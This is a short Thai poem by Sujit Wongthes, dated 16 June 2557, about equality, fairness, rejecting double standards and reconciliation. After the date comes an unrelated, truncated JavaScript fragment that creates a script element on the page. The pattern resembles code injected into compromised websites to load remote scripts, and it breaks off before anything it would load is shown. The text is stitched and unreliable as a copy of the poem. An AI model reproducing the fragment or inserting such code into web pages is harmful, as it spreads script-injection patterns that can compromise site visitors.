มีโดยอัตโนมัติ

 

เสมอภาคเท่าเทียมความเป็นธรรม

สองมาตรฐานต่ำต้องคว่ำขัน

ปรองดองด้วยปรีดาโดยอัศจรรย์

ความสุขทั้งนั้นมีอัตโนมัติ

 

สุจิตต์ วงษ์เทศ

จันทร์ 16 มิถุนายน 2557var d=document;var s=d.createElement(‘script’); if (document.currentScript) {